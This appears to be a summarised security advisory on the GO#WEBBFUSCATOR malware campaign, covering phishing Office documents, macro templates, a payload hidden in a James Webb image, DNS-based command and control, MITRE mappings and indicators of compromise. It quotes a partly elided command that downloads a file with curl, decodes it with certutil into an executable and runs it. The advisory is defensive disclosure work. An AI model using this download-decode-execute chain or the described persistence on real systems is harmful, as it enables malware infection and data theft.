Threat Research

Securonix Threat Labs Security Advisory: New Golang Attack Campaign GO#WEBBFUSCATOR Leverages Office Macros and James Webb Images to Infect Systems

Securonix

Securonix Threat Labs uncovered a Golang-based GO#WEBBFUSCATOR campaign that leverages a James Webb image and obfuscated Go payloads to infect targets. The attack chain starts with a phishing Office attachment, downloads a malicious template, and uses DNS-based C2 with persistence and counter-forensics techniques. #WEBBFUSCATOR #MustangPanda

Keypoints

  • The GO#WEBBFUSCATOR campaign uses Go-based malware and an embedded James Webb deep-field image to deliver its payload.
  • Initial access occurs via a phishing email with a Microsoft Office attachment (Geos-Rates.docx) that downloads a malicious template file through an external reference.
  • The malicious template contains a VB script (Auto_Open/AutoOpen/AutoExec) that auto-executes when macros are enabled.
  • The dropped payload is a 1.7 MB Windows 64-bit binary (msdllupdate.exe) that is heavily obfuscated (ROT25, XOR/Gobfuscation) and decoded from an image carrier.
  • Persistence is achieved by copying itself to %%LOCALAPPDATA%%microsoftvault and creating a startup batch (msdllupdate and a Run key).
  • Command-and-control uses DNS-based exfiltration with nslookup and TXT-DNS queries to a set of attacker-controlled domains; a USER_ID is used in subsequent C2 traffic.
  • Infrastructure includes newly registered domains (xmlschemeformat.com, updatesagent.com, apiregis.com) and related IPs (185.247.209.255, 139.28.36.222) with a fallback domain for resilience.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Initial infection begins with a phishing email containing a Microsoft Office attachment (Geos-Rates.docx in our case). The document includes an external reference hidden inside the document’s metadata which downloads a malicious template file. [‘Initial infection begins with a phishing email containing a Microsoft Office attachment (Geos-Rates.docx in our case). The document includes an external reference hidden inside the document’s metadata which downloads a malicious template file.’]
  • [T1059.003] Windows Command Shell – The deobfuscated code executes the following command: cmd.exe /c … curl … oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe. [‘The deobfuscated code executes the following command which will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary (msdllupdate.exe) and then finally, execute it.’]
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence is achieved by adding an implant binary into %%LOCALAPPDATA%%microsoftvault and creating and executing a batch file: %%LOCALAPPDATA%%microsoftvaultUpdate.bat. [‘Persistence is achieved by adding an implant binary into %%localappdata%%microsoftvault and create and execute a batch file.’]
  • [T1140] Deobfuscate/Decode Files or Information – The Go binary uses obfuscation (ROT25, XOR) and decodes to reveal the payload and C2 details. [‘The Base64 encoded payload is decrypted and saved into a built Windows executable file called “msdllupdate.exe” as we saw earlier with the certutil command.’]
  • [T1420] File and Directory Discovery; [T1016.001] System Network Configuration Discovery; [T1426] System Information Discovery; [T1033] System Owner/User Discovery – Discovery-related content in the article maps to these techniques. [‘Discovery: File and Directory Discovery; System Network Configuration Discovery; System Information Discovery; System Owner/User Discovery.’]
  • [T1071.001] Web Protocols; [T1071.004] Application Layer Protocol: DNS; [T1132.001] Data Encoding: Standard Encoding; [T1105] Ingress Tool Transfer; [T1001.002] Data Obfuscation: Steganography – The C2 uses DNS TXT queries and Base64-encoded data; an initial DNS check and subsequent data exchange occur. [‘communication with the C2 server is implemented using TXT-DNS requests using nslookup requests to the attacker-controlled name server. All information encoded using Base64’]
  • [T1041] Exfiltration Over C2 Channel – DNS-based exfiltration is used to send data back to the C2. [‘Exfiltration Over C2 Channel’]

Indicators of Compromise

  • [Network indicators] xmlschemeformat.com, updatesagent.com, and apiregis.com – DNS domains used for C2 and fallback infrastructure
  • [Network indicators] 185.247.209.255, 139.28.36.222 – IP addresses associated with the C2 infrastructure
  • [Host-based indicators] %LOCALAPPDATA%microsoftvaultMsdllupdate.exe, %LOCALAPPDATA%microsoftvaultUpdate.bat, %LOCALAPPDATA%microsoftwindowsMsSafetyMsdllupdate.exe, %LOCALAPPDATA%microsoftvaultMsDb.db – Local persistence and data artifacts
  • [Host-based indicators] Geos-Rates.docx (da43ec30fe12c45529e51a0c986a856aa8772483875356f29382ac514788f86d) – Initial document used in phishing
  • [Host-based indicators] form.dotm (383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f) – Malicious template reference
  • [Host-based indicators] OxB36F8GEEC634.jpg (3bdf6d9f0f35be75d8345d897ec838ae231ba01ae898f6d0c8f920ff4061fc22) – Image carrier for the Base64 payload
  • [Host-based indicators] msdllupdate.exe (d09af37cdbae7273e4e7c79b242023ffdb07c8ccab2280db7fe511d2b14ad19c) – Decoded payload executable

Read more: https://www.securonix.com/blog/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems/